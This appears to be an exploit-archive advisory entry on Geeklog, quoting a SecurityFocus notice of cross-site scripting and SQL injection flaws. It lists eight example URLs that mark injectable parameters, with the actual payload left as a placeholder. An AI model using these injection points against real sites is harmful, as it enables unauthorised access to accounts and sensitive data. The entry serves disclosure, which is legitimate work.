24 lines
No EOL
1,019 B
Text
Executable file
24 lines
No EOL
1,019 B
Text
Executable file
source: http://www.securityfocus.com/bid/8718/info
|
|
|
|
Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information.
|
|
|
|
Some of these issues may be related to previously documented vulnerabilities in Geeklog.
|
|
|
|
http://www.example.com/index.php?topic=te'st/[SQL INJECTION CODE]
|
|
|
|
http://www.example.com/forum/viewtopic.php?forum=1&showtopic=1'0/[SQL INJECTION
|
|
CODE]
|
|
|
|
http://www.example.com/staticpages/index.php?page=test'test/[SQL INJECTION CODE]
|
|
|
|
http://www.example.com/filemgmt/visit.php?lid=1'1'0/[SQL INJECTION CODE]
|
|
|
|
http://www.example.com/filemgmt/viewcat.php?cid='6/[SQL INJECTION CODE]
|
|
|
|
http://www.example.com/comment.php?type=filemgmt&cid=filemgmt-1'70/[SQL INJECTION
|
|
CODE]
|
|
|
|
http://www.example.com/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL
|
|
INJECTION CODE]
|
|
|
|
http://www.example.com/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE] |